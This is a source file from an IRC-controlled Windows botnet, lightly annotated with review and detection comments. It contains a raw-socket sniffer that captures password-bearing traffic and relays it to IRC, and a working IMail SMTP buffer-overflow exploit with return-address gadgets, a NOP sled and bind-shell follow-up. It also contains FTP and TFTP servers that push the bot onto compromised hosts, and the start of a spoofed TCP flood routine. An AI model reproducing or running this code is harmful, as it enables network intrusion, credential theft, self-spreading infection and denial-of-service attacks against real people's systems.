		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		clearthread(sniff.threadnum);

		ExitThread(0);
	}
	threads[sniff.threadnum].sock = sniffsock;	// lets stopthread()/killthreadid() close it

	if (fbind(sniffsock, (LPSOCKADDR)&ssin, sizeof(ssin)) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF]: Error: bind() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	// SIO_RCVALL: deliver every IP packet seen on the bound interface (promiscuous mode)
	if (fWSAIoctl(sniffsock, SIO_RCVALL, &dwMode, sizeof(dwMode), NULL, 0, &dwRet, NULL, NULL) == SOCKET_ERROR) {
		sprintf(sendbuf, "[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.", fWSAGetLastError());
		if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
		addlog(sendbuf);

		fclosesocket(sniffsock);
		clearthread(sniff.threadnum);

		ExitThread(0);
	}

	while(1) {
		// zeroing gives the strstr() calls below a terminator -- except when a packet
		// fills all 65535 bytes, in which case nothing terminates the payload
		memset(rawdata, 0, sizeof(rawdata));
		Packet = (char *)rawdata;

		if (frecv(sniffsock, Packet, sizeof(rawdata), 0) == SOCKET_ERROR) {
            _snprintf(sendbuf,sizeof(sendbuf),"[PSNIFF]: Error: recv() failed, returned: <%d>", fWSAGetLastError());
			if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice);
			addlog(sendbuf);

            break;
        }

		ip = (IPHEADER *)Packet;
		if (ip->proto == 6) {	// IPPROTO_TCP
			// advances by sizeof(IPHEADER); if that is the fixed 20-byte layout, IP options
			// are not skipped and the TCP header would be misread for such packets -- confirm
			Packet += sizeof(*ip);
			tcp = (TCPHEADER *)Packet;

			sia.S_un.S_addr = ip->sourceIP;
			dia.S_un.S_addr = ip->destIP;

			if (tcp->flags == 24) {	// PSH|ACK only: segments carrying application data
				Packet += sizeof(*tcp);	// same caveat: TCP options are not skipped
				if (strstr(Packet, "[PSNIFF]") == NULL) {	// ignore our own report lines going out
					for (i=0;i < sizeof(pswords) / sizeof(PSWORDS);i++) {
						if (strstr(Packet, pswords[i].text)) {
							// the full payload is echoed into the report
							_snprintf(sendbuf, sizeof(sendbuf), "[PSNIFF]: Suspicious %s packet from: %s:%d to: %s:%d - %s", 
								ptype[pswords[i].type], finet_ntoa(sia), fntohs(tcp->sport), finet_ntoa(dia), fntohs(tcp->dport), Packet);
							if (!sniff.silent) irc_privmsg(sniff.sock, sniff.chan, sendbuf, sniff.notice, TRUE);
							printf("%s\n",sendbuf);	// also to stdout (visible in a debug build/console)
							addlog(sendbuf);

							break;	// first matching keyword wins
						}
					}
				}
			}
		}
	}
	fclosesocket(sniffsock);
	clearthread(sniff.threadnum);

	ExitThread(0);
}
/*
 * Spreader routine targeting the SMTP "RCPT TO" stack overflow in Ipswitch
 * IMail 8.x.  The addresses listed in the comments below are per-OS/IMail
 * return-address gadgets; the payload is the file-level Win32Bind shellcode
 * (not shown).  After sending, it reconnects, calls shell_connect() on the
 * fixed port 6236 and reports the host to IRC.  The request is assembled in
 * the static `overflow` buffer, so the routine is not reentrant across
 * threads.
 *
 * param   struct exploits* (ip, port, ...); gotinfo is set so the spawner
 *         may reuse it.
 * target  IRC target for the "Exploiting IP:" report.
 * host    name resolved with gethostbyname() and connected to.
 * Returns false on any setup/socket failure; ends with _endthreadex(0)
 * after the report, so the trailing return statements are then unreachable.
 *
 * Defensive notes: an "RCPT TO: <@" line followed by non-printable bytes and
 * a long run of 0x90 is a straightforward IDS signature; port 6236 is the
 * expected follow-up connection.
 */
unsigned int __stdcall ipswitch_exploit(void *param, char *target, const char *host)
{

	struct exploits exploit = *(struct exploits *)param;	// private copy of the request
	struct exploits *pexploit = (struct exploits *)param;
	pexploit->gotinfo = true;	// signals the spawner that param may be reused
   static char overflow[1028];	// shared across all threads running this routine

   WSADATA wsaData;

   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   int plen, i;

   
	//JMP = atoi("1");

   	if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0) {
    	//fprintf(stderr, "Error setting up with WinSock v1.1\n");
      	return false;
   	}


   	hp = gethostbyname(host);
   	if (hp == NULL) {
      	//printf("ERROR: Uknown host %s\n", exploit.ip);
	  	//printf("%s",exploit.ip);
      	return false;
   	}

   	sockin.sin_family = hp->h_addrtype;
   	sockin.sin_port = htons(exploit.port);
   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)	{
      	//printf("ERROR: Socket Error\n");
      	return false;
   	}

   	if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR) {
      	//printf("ERROR: Connect Error\n");
      	closesocket(sockfd);
      	WSACleanup();
      	return false;;
   	}



   	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR) {
      	//printf("ERROR: Recv Error\n");
      	closesocket(sockfd);
      	WSACleanup();
      	return false;
   	}

   	/* wait for SMTP service welcome*/
   	buf[bytes] = '\0';	// buf is 300 bytes and recv may fill all 300: the terminator then lands one past the end
   	check = strstr(buf, "220");
   	if (check == NULL) {
      	//printf("ERROR: NO  response from SMTP service\n");
      	closesocket(sockfd);
      	WSACleanup();
		return false;
   	}


   // JMP to EAX = Results in a Corrupted Stack
   // so instead we POP EBP, RET to restore pointer and then return
   // this causes code procedure to continue
   /*
   		['IMail 8.x Universal', 0x10036f71 ],
		['Windows 2003 SP1 English', 0x7c87d8af ],
		['Windows 2003 SP0 English', 0x77d5c14c ],
		['Windows XP SP2 English', 0x7c967e23 ],
		['Windows XP SP1 English', 0x71ab389c ],
		['Windows XP SP0 English', 0x71ab389c ],
		['Windows 2000 Universal English', 0x75021397 ],
		['Windows 2000 Universal French', 0x74fa1397],
		['Windows XP SP1 - SP2 German', 0x77d18c14],
	*/
   	char Exp[] = "RCPT TO: <@";						// This stores our JMP between the @ and :
   	char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:";		//Win2k3 SP1 English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
  	char WinXPSP2E[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English  NTDLL.DLL [pop ebp, ret] 0x7c967e23
   	char IMail815[] = "\x71\x6f\x03\x10:"; 			//IMAIL 8.15 SMTPDLL.DLL	   [pop ebp, ret] 0x10036f71
	char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:";		//Win2k3 SP0 English USER32.DLL [pop ebp, ret]0x77d5c14c
	char WinXPSP2[] = "\x23\x7e\x96\x7c:";			//WinXP SP2 English USER32.DLL [pop ebp, ret] 0x7c967e23
	char WinXPSP1[] = "\x9c\x38\xab\x71:";			//WinXP SP1 and 0 English U32	[pop ebp, ret]0x71ab389c
	char Win2KE[] = "\x97\x31\x02\x75:";			//Win2k English All SPs			[pop ebp, ret]0x75021397
	char Win2KF[] = "\x97\x13\xfa\x74:";			// As above except French Win2k	[pop ebp, ret]0x74fa1397
	char WinXPG[] = "\x14\x8c\xd1\x77:";			//WinXP SP1 - SP2 German U32    [pop ebp, ret]0x77d18c14

	char tail[] = "SSS>\n";							// This closes the RCPT cmd.  Any characters work.
	// Another overflow can be achieved by using an overly long buffer after RCPT TO: on 8.15 systems
	// After around 560 bytes or so EIP gets overwritten.  But this method is easier to exploit and it works
	// On all versions from 8.x to 2006 (9.x?)
	char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44";	// Stabolize Stack prior to payload.
   	memset(overflow, 0, 1028);
   	strcat(overflow, Exp);
		strcat(overflow, IMail815);
		strcat(overflow, Win2k3SP1E);
		strcat(overflow, WinXPSP1);
		strcat(overflow, Win2KE);
		plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));	// Win32Bind: file-level payload
		for (i=0; i<plen; i++){
			strcat(overflow, "\x90");
		}
		strcat(overflow, StackS);
		strcat(overflow, Win32Bind);

	// Dont forget to add the trailing characters to set up stack overflow
	strcat(overflow, tail);	// no bound against the 1028-byte buffer on any of the strcat() calls



	// Connect to SMTP Server and Setup Up Email
   	char EHLO[] = "EHLO \r\n";
   	char MF[] = "MAIL FROM <TEST@TEST> \r\n";
   	send(sockfd, EHLO, strlen(EHLO), 0);	// replies to these two commands are never read
   	Sleep(1000);
   	send(sockfd, MF, strlen(MF), 0);
   	Sleep(1000);


   	if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   	{
		//printf("ERROR: Send Error\n");
      	closesocket(sockfd);
      	WSACleanup();
      	return false;
  	}

		closesocket(sockfd);
      	WSACleanup();
 

	Sleep(1000);
	closesocket(sockfd);	// second close of the same descriptor

	// Second connection: the banner is re-read, but the failure branches below
	// only close the socket and fall through without returning.
	sockin.sin_family = hp->h_addrtype;
   	sockin.sin_port = htons(exploit.port);
   	sockin.sin_addr = *((struct in_addr *)hp->h_addr);

   	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   	{

      	return false;
   	}

   	if ((connect(sockfd, (struct sockaddr *) &sockin,sizeof(sockin))) == SOCKET_ERROR)
   	{

		closesocket(sockfd);
		WSACleanup();
	
   	}

	if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   	{
      
		closesocket(sockfd);
		WSACleanup();
	
   	}


   	buf[bytes] = '\0';	// bytes may be -1 (SOCKET_ERROR) here, indexing before the buffer
   	check = strstr(buf, "220");
   	if (check == NULL)
   	{
 
		closesocket(sockfd);
		WSACleanup();

   	}



	closesocket(sockfd);
  	WSACleanup();

	// shell_connect()'s result is not tested: the braces form a plain block, not a
	// conditional, so the report and thread exit always follow
	shell_connect(exploit.ip, 6236); {
		irc_privmsg(target, "Exploiting IP: %s", exploit.ip);
		closesocket(sockfd);
	_endthreadex(0);
		return true;
	 }
  	return false;
}
/*
 * Reports which of the bot's dynamically loaded DLLs failed to resolve at
 * start-up: the no<dll> flags and no<dll>err codes are file-level globals
 * set by the loader (presumably the GetLastError value -- confirm there).
 * One IRC line per failed DLL, then a completion line.  Diagnostic only.
 *
 * sock/chan/notice  IRC destination.
 * silent            suppresses only the final "DLL test complete." line;
 *                   the per-DLL failure lines are always sent.
 */
void CheckDLLs(SOCKET sock, char *chan, BOOL notice, BOOL silent)
{
	char sendbuf[IRCLINE];

	if (nokernel32) {
		sprintf(sendbuf,"Kernel32.dll failed. <%d>", nokernel32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nouser32) {
		sprintf(sendbuf,"User32.dll failed. <%d>", nouser32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (noadvapi32) {
		sprintf(sendbuf,"Advapi32.dll failed. <%d>", noadvapi32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nogdi32) {
		sprintf(sendbuf,"Gdi32.dll failed. <%d>", nogdi32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nows2_32) {
		sprintf(sendbuf,"Ws2_32.dll failed. <%d>", nows2_32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nowininet) {
		sprintf(sendbuf,"Wininet.dll failed. <%d>", nowinineterr);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (noicmp) {
		sprintf(sendbuf,"Icmp.dll failed. <%d>", noicmperr);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nonetapi32) {
		sprintf(sendbuf,"Netapi32.dll failed. <%d>", nonetapi32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nodnsapi) {
		sprintf(sendbuf,"Dnsapi.dll failed. <%d>", nodnsapierr);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (noiphlpapi) {
		sprintf(sendbuf,"Iphlpapi.dll failed. <%d>", noiphlpapierr);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (nompr) {
		sprintf(sendbuf,"Mpr32.dll failed. <%d>", nomprerr);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (noshell32) {
		sprintf(sendbuf,"Shell32.dll failed. <%d>", noshell32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	if (noodbc32) {
		sprintf(sendbuf,"Odbc32.dll failed. <%d>", noodbc32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	// Avicap32 is only loaded when webcam capture is compiled in
	#ifndef NO_CAPTURE
	if (noavicap32) {
		sprintf(sendbuf,"Avicap32.dll failed. <%d>", noavicap32err);
		irc_privmsg(sock, chan, sendbuf, notice);
	}
	#endif

	sprintf(sendbuf,"[MAIN]: DLL test complete.");
	if (!silent) irc_privmsg(sock, chan, sendbuf, notice); 
	addlog(sendbuf);	// logged even when silent

	return;
}
/*
 * Thread entry for the bot's built-in FTP server, the payload-delivery side
 * of the spreader: listens on a random port (FTP_PORT, file-level, chosen
 * from 1030-65200), accepts any USER/PASS, and on RETR pushes ftp.filename
 * (this bot) to the address/port the client supplied in PORT, via
 * ftp_Data_connect()/Ftp_data_transfer() (not shown).  Single select() loop
 * over all client sockets.
 *
 * The literal banner "220 NzmxFtpd 0wns j0", the "[ROOTED]:" channel line
 * and "221 Goodbye happy r00ting." are usable network/IRC signatures.
 *
 * NOTE(review): every parse below (sscanf "%s %s", the "%[^,]" fields) is
 * unbounded and fed straight from the network into fixed stack buffers
 * (a/b/c/d are 4 bytes, tmpbuf/tmpbuf2 100), so the server is itself
 * remotely crashable.
 *
 * pParam  FTP* (filename, IRC fields).
 * Returns 1 only on bind()/select() failure; otherwise loops forever.
 */
DWORD WINAPI ftpd(LPVOID pParam) {

	WSADATA wsdata;
	SOCKET listener;
	SOCKET newfd;

	char sendbuf[IRCLINE];
	struct sockaddr_in server_address;
	struct sockaddr_in remoteaddr;
	long h;	// data port parsed from the last PORT command
	int reuse_addr = 1;
	unsigned long mode = 1;	// FIONBIO: non-blocking listener
	int fdmax;
	int i;
	int addrlen;
	int nbytes;

	char buf[100];	// recv() may fill all 100 bytes, leaving no NUL for sscanf()
//	char t_buf[1024];
	char tmpbuf[100];	// command word
	char tmpbuf2[100];	// first argument
	char a[4];	// PORT octets as text -- 4 bytes each, unbounded sscanf below
	char b[4];
	char c[4];
	char d[4];
	char p1[50];
	char p2[50];
	char tmpip[15];	// dotted quad built from a.b.c.d (15 bytes = no room for the NUL at full length)
	int po,po2;

	FTP ftp = *((FTP *)pParam);	// private copy of the request
	FTP *ftps = (FTP *)pParam;
	ftps->gotinfo = TRUE;	// signals the spawner that pParam may be reused

	struct fd_set master;   // master file descriptor list
	struct fd_set read_fds; // temp file descriptor list for select()

	FD_ZERO(&master);    // clear the master and temp sets
	FD_ZERO(&read_fds);

	WSAStartup(0x0101, &wsdata);	// return value ignored

	srand(time(NULL));
	FTP_PORT = brandom(1030,65200);	// file-level global, also read by the spreader

	listener = socket(AF_INET, SOCK_STREAM, 0);	// return value not checked
	setsockopt(listener, SOL_SOCKET, SO_REUSEADDR, (char*)&reuse_addr,sizeof(reuse_addr));
	ioctlsocket(listener, FIONBIO, &mode);

	server_address.sin_family = AF_INET;
	server_address.sin_addr.s_addr = INADDR_ANY;	// all interfaces
	server_address.sin_port = htons(FTP_PORT);

	if (bind(listener, (struct sockaddr *) &server_address,sizeof(server_address)) < 0 ) {
		return 1;	// listener is leaked and the thread slot is not cleared
	}

	listen(listener,10);

	FD_SET(listener, &master);

	fdmax = listener;


	while(1) {
		read_fds = master;	// select() modifies its set, so work on a copy
		if (select(fdmax+1, &read_fds, NULL, NULL, NULL) == -1) {
			return 1;
    	}
		// NOTE(review): iterating 0..fdmax assumes BSD-style small integer descriptors;
		// Winsock SOCKET values are arbitrary handles, so this walk is not reliable on Windows
		for(i = 0; i <= fdmax; i++) {
			memset(buf,0,sizeof(buf));
			memset(tmpbuf,0,sizeof(tmpbuf));
			if (FD_ISSET(i, &read_fds)) {
				if (i == (int)listener) {	// new control connection
					addrlen = sizeof(remoteaddr);
					if ((newfd = accept(listener, (struct sockaddr *)&remoteaddr,&addrlen)) != -1) {
						FD_SET(newfd, &master);
						if ((int)newfd > fdmax) {
							fdmax = newfd;
						}
						send(newfd, "220 NzmxFtpd 0wns j0\n",21 , 0);	// greeting banner (signature)
					}
				} else {	// data from an existing client
					if ((nbytes = recv(i, buf, sizeof(buf), 0)) <= 0) {
						FD_CLR(i, &master);
						closesocket(i);
					} else {
						// unbounded %s into 100-byte buffers; buf has no guaranteed terminator
						sscanf(buf,"%s %s",tmpbuf,tmpbuf2);
						if (strcmp(tmpbuf,"USER") == 0) {
							send(i,"331 Password required\n",22 , 0);
						}
						else if (strcmp(tmpbuf,"PASS") == 0) {
							send(i,"230 User logged in.\n",20 , 0);	// any password is accepted
						}
						else if (strcmp(tmpbuf,"SYST") == 0) {
							send(i,"215 NzmxFtpd\n",13 , 0);
						}
						else if (strcmp(tmpbuf,"REST") == 0) {
							send(i,"350 Restarting.\n",16 , 0);
						}
						else if (strcmp(tmpbuf,"PWD") == 0) {
							send(i,"257 \"/\" is current directory.\n",30 , 0);
						}
						else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"A") == 0)) {
							send(i,"200 Type set to A.\n",19 , 0);
						}
						else if ((strcmp(tmpbuf,"TYPE") == 0) && (strcmp(tmpbuf2,"I") == 0)) {
							send(i,"200 Type set to I.\n",19 , 0);
						}
						else if (strcmp(tmpbuf,"PASV") == 0) {
							char pasv[] = "425 Passive not supported on this server\n";	// active mode only
							send(i, pasv, strlen(pasv), 0);
						}
						else if (strcmp(tmpbuf,"LIST") == 0) {
							char list[] = "226 Transfer complete\n";	// no listing is ever sent
							send(i, list, strlen(list), 0);
						}
						else if (strcmp(tmpbuf,"PORT") == 0) {
							// "PORT h1,h2,h3,h4,p1,p2": unbounded %[^,] into 4- and 50-byte buffers
							sscanf(buf,"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]",a,b,c,d,p1,p2);
							po = atoi(p1);
							po2 = atoi(p2);
							memset(p1,0,sizeof(p1));
							// data port derived by concatenating the two octets as hex digits;
							// this equals p1*256+p2 only when p2 prints as two hex digits (p2 >= 16)
							sprintf(p1,"%x%x\n",po,po2);
							h = strtoul(p1, NULL, 16);
							sprintf(tmpip,"%s.%s.%s.%s",a,b,c,d);	// unbounded into tmpip[15]
							send(i,"200 PORT command successful.\n",29 , 0);

						}
						else if (strcmp(tmpbuf,"RETR") == 0) {	// requested file name is ignored: always ftp.filename
							send(i,"150 Opening BINARY mode data connection\n",40 , 0);
							if(ftp_Data_connect(tmpip,(int)h) == 1) {	// active-mode connect back to the client
								if (Ftp_data_transfer() == 1) {
									send(i,"226 Transfer complete.\n",23 , 0);
									sprintf(sendbuf,"4<<12[ROOTED]:   %s, port:%d now executing %s on remote machine.4>>",tmpip,FTP_PORT,ftp.filename);
									if (!ftp.silent) irc_privmsg(ftp.sock,ftp.chan,sendbuf,ftp.notice);
									addlog(sendbuf);

								}
							} else {
								send(i,"425 Can't open data connection.\n",32,0);
							}
						}
						else if (strcmp(tmpbuf,"QUIT") == 0) {
							send(i,"221 Goodbye happy r00ting.\n",27 , 0);	// socket is not closed here; recv()<=0 later does that
						}
						memset(buf,0,sizeof(buf));
					}
				}
			}
		}
	}
	return 1;
}
/*
 * Thread entry for the bot's TFTP server (payload delivery for the
 * spreader): serves one file, tftp.filename, on UDP port tftp.port to any
 * client that sends an RRQ for tftp.requestname in "octet" mode.  Only RRQ
 * and ACK are implemented; anything else gets a TFTP error packet.
 * Re-invokes itself (tail call) when bind() fails and after every completed
 * session, for as long as the spawner's gotinfo flag stays set.
 *
 * The "[TFTP]: File transfer started/complete to IP:" channel lines are
 * usable IRC signatures.
 *
 * param  TFTP* (filename, requestname, port, threads counter, IRC fields,
 *        threadnum); read again on every recursive call.
 * Never returns normally: exits via ExitThread(0) or recurses.
 */
DWORD WINAPI tftpserver(LPVOID param) 
{ 
	FILE *fp;

	char sendbuf[IRCLINE], buffer[128], type[]="octet", IP[18];	// buffer: one inbound request
	int err=1; 	// bytes from the last recvfrom()/fread(); loop ends once it reaches 0

	TFTP tftp = *((TFTP *)param);	// private copy of the request
	TFTP *tftps = (TFTP *)param;
	tftps->gotinfo = TRUE;	// also used below as the "keep serving" flag
	tftp.threads++; 	// counter on the private copy only, so it never reaches the spawner

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_DGRAM,0)) == INVALID_SOCKET) {
		Sleep(400);
		sprintf(sendbuf,"[TFTP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
		addlog(sendbuf);

		clearthread(tftp.threadnum);

		ExitThread(0);
	}
	threads[tftp.threadnum].sock=ssock;	// lets stopthread()/killthreadid() close it

	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));
	ssin.sin_family = AF_INET; 
	ssin.sin_port = fhtons((unsigned short)tftp.port); 
	ssin.sin_addr.s_addr = INADDR_ANY; 	// all interfaces

	if((fbind(ssock, (LPSOCKADDR)&ssin, sizeof(ssin))) == SOCKET_ERROR) { 
		Sleep(5000); 
		tftp.threads--; 

		// NOTE(review): retries by recursing without closing ssock; each failed bind
		// leaks a socket and adds a stack frame, with no upper bound
		return tftpserver(param); 
	} 

	if ((fp=fopen(tftp.filename, "rb")) == NULL) {
		Sleep(400);
		sprintf(sendbuf,"[TFTP]: Failed to open file: %s.",tftp.filename);
		irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);	// sent regardless of silent
		addlog(sendbuf);

		clearthread(tftp.threadnum);

		ExitThread(0);	// ssock is not closed on this path
	}

	// tftps->gotinfo is the shared struct's flag: clearing it from outside stops the server
	while(err>0 && tftps->gotinfo && fp) { 
		TIMEVAL timeout; 
		timeout.tv_sec=5; 
		timeout.tv_usec=5000; 

		fd_set fd; 
		FD_ZERO(&fd); 
		FD_SET(ssock,&fd); 

		memset(buffer,0,sizeof(buffer)); 
		if(fselect(0,&fd,NULL,NULL,&timeout) > 0) { 
			SOCKADDR_IN csin; 
			int csin_len=sizeof(csin); 
			char f_buffer[BLOCKSIZE+4]=""; 	// 4-byte DATA header + one block
			
			err=frecvfrom(ssock, buffer, sizeof(buffer), 0, (LPSOCKADDR)&csin, &csin_len); 
			sprintf(IP,finet_ntoa(csin.sin_addr));	// address text used as the *format* string (CWE-134)
        
			// parse buffer
			if(buffer[0]==0 && buffer[1]==1) { //RRQ
				char *tmprequest=buffer,*tmptype=buffer;
				tmprequest+=2; //skip the opcode
				// assumes the client's file name has exactly strlen(requestname) bytes;
				// a longer name puts tmptype somewhere inside the name instead of on the mode
				tmptype+=(strlen(tftp.requestname)+3); //skip the opcode and request name + NULL
				if(strncmp(tftp.requestname,tmprequest,strlen(tftp.requestname)) != 0||strncmp(type,tmptype,strlen(type)) != 0) { 
					// ERROR packet, code 1, "File Not Found"
					fsendto(ssock, "\x00\x05\x00\x01\x46\x69\x6C\x65\x20\x4E\x6F\x74\x20\x46\x6F\x75\x6E\x64\x00", 19, 0, (LPSOCKADDR)&csin,csin_len);
					// for loop to add a \0 to the end of the requestname
					sprintf(buffer,"[TFTP]: File not found: %s (%s).",IP,tftp.requestname);	// reuses the request buffer for the log line
					addlog(buffer);
				} else { // good rrq packet send first data packet 
					fseek(fp, 0, SEEK_SET); 
					f_buffer[0]=0; f_buffer[1]=3; // DATA
					f_buffer[2]=0; f_buffer[3]=1; // DATA BLOCK #
					err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); 
					fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);

					sprintf(sendbuf,"[TFTP]: File transfer started to IP: %s (%s).",IP,tftp.filename);
					if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
					addlog(sendbuf);
				} 
			} else if(buffer[0]==0 && buffer[1]==4) { // ACK 
				// send next packet 
				unsigned int blocks; 
				BYTE b1=buffer[2],b2=buffer[3]; // ACK BLOCK #

				f_buffer[0]=0; f_buffer[1]=3;	// DATA
				if (b2==255) {					// DATA BLOCK #  (16-bit block number kept as two bytes)
					f_buffer[2]=++b1;
					f_buffer[3]=b2=0;
				} else {
					f_buffer[2]=b1;
					f_buffer[3]=++b2;
				}

				// block number comes straight from the client: it selects the file offset below
				blocks=(b1 * 256) + b2 - 1; 
				// remember to subtract 1 as the ACK block # is 1 more than the actual file block #
				fseek(fp, blocks * BLOCKSIZE, SEEK_SET); 
				err=fread(&f_buffer[4], 1, BLOCKSIZE, fp); 
				fsendto(ssock, f_buffer, err + 4, 0, (LPSOCKADDR)&csin, csin_len);
				if (err==0) {	// empty DATA packet = end of file; err==0 also ends the while loop
					sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s (%s).",IP,tftp.filename);
					if (!tftp.silent) irc_privmsg(tftp.sock,tftp.chan,sendbuf,tftp.notice);
					addlog(sendbuf);
				}
			} else { // we dont support any other commands 
				// ERROR packet, code 4 (illegal operation), message "kthx"
				fsendto(ssock, "\x00\x05\x00\x04\x6B\x74\x68\x78\x00",9, 0, (LPSOCKADDR)&csin, csin_len); 
			} 
		} else 
			continue;	// select() timed out or failed: poll again
	} 
	// check for ack, then msg irc on transfer complete

	fclosesocket(ssock); 
	fclose(fp); 

	tftp.threads--; 
	if(tftps->gotinfo == FALSE) {	// stopped from outside: do not restart
		clearthread(tftp.threadnum);

		ExitThread(0); 
	}
	Sleep(1000);
   
	return tftpserver(param); 	// serve the next client; each session adds a stack frame
} 
// TCP flood thread (IRC-driven denial of service).
// `param` points at a TCPFLOOD block filled in by the command handler; it is
// copied locally and the owner's `gotinfo` flag is raised so the block may be
// reused.  The traffic is produced on a raw socket with IP_HDRINCL, so every
// IP and TCP header field below is written by hand — which also gives the
// packets a constant fingerprint (see the detection notes in the send loop).
// Raw sockets need elevated privilege; the thread never returns normally, it
// always leaves through clearthread() + ExitThread(0).
DWORD WINAPI TcpFloodThread(LPVOID param) 
{
	TCPFLOOD tcpflood = *((TCPFLOOD *)param);
	TCPFLOOD *tcpfloods = (TCPFLOOD *)param;
	tcpfloods->gotinfo = TRUE;

	// szSendBuf is the on-the-wire datagram (IP header, TCP header, padding);
	// it is zero-initialised here and sent in full (all 60 bytes) every time.
	char sendbuf[IRCLINE], szSendBuf[60]={0};

	// Header scratch structures (project types).  tcpHeader is never zeroed,
	// so any field not assigned in the loop keeps whatever the stack held.
	IPHEADER ipHeader; 
	TCPHEADER tcpHeader; 
	PSDHEADER psdHeader; 

	// rand() drives the spoofed source address, the ports and the flag choice.
	srand(GetTickCount());

	SOCKET ssock;
	if ((ssock=fsocket(AF_INET,SOCK_RAW,IPPROTO_RAW)) == INVALID_SOCKET) {
		sprintf(sendbuf,"[TCP]: Error: socket() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}
	
	// IP_HDRINCL: the kernel must not prepend its own IP header.
	BOOL flag = TRUE; 
	if (fsetsockopt(ssock, IPPROTO_IP, IP_HDRINCL, (char *)&flag, sizeof(flag)) == SOCKET_ERROR) { 
		sprintf(sendbuf,"[TCP]: Error: setsockopt() failed, returned: <%d>.", fWSAGetLastError());
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	} 

	// Note: the socket opened above is not closed on this exit path.
	if (finet_addr(tcpflood.ip) == INADDR_NONE) {
		sprintf(sendbuf,"[TCP]: Invalid target IP.");
		if (!tcpflood.silent) irc_privmsg(tcpflood.sock,tcpflood.chan,sendbuf,tcpflood.notice);
		addlog(sendbuf);

		clearthread(tcpflood.threadnum);

		ExitThread(0);
	}

	// Destination for sendto(); the port here is irrelevant because the TCP
	// header (and therefore the real destination port) is built by hand.
	SOCKADDR_IN ssin;
	memset(&ssin, 0, sizeof(ssin));	
	ssin.sin_family=AF_INET; 
	ssin.sin_port=fhtons(0); 
	ssin.sin_addr.s_addr=finet_addr(tcpflood.ip); 

	int sent = 0;
	unsigned long start = GetTickCount();

	// Runs for tcpflood.time seconds (wall clock via GetTickCount).
	// Detection notes — everything below is constant or narrowly random:
	// IP ident is always 1, TTL 128, TCP sequence number always 0x12345678,
	// window 512, urgent pointer 0, source port (and destination port when
	// tcpflood.port == 0) drawn from 0..1024, and each datagram is exactly
	// sizeof(szSendBuf) bytes.  That combination is a usable IDS signature.
	while (((GetTickCount() - start) / 1000) <= (unsigned long)tcpflood.time) {
		ipHeader.verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long)); 
		ipHeader.total_len=fhtons(sizeof(ipHeader)+sizeof(tcpHeader)); 
		ipHeader.ident=1; 
		ipHeader.frag_and_flags=0; 
		ipHeader.ttl=128; 
		ipHeader.proto=IPPROTO_TCP; 
		ipHeader.checksum=0; 
		// Source address: a random 32-bit value when spoofing, otherwise the
		// local address of the bot's IRC socket (GetIP is defined elsewhere).
		ipHeader.sourceIP=((tcpflood.spoof)?(rand()+(rand()<<8)+(rand()<<16)+(rand()<<24)):(finet_addr(GetIP(tcpflood.sock))));
		ipHeader.destIP=ssin.sin_addr.s_addr;
		
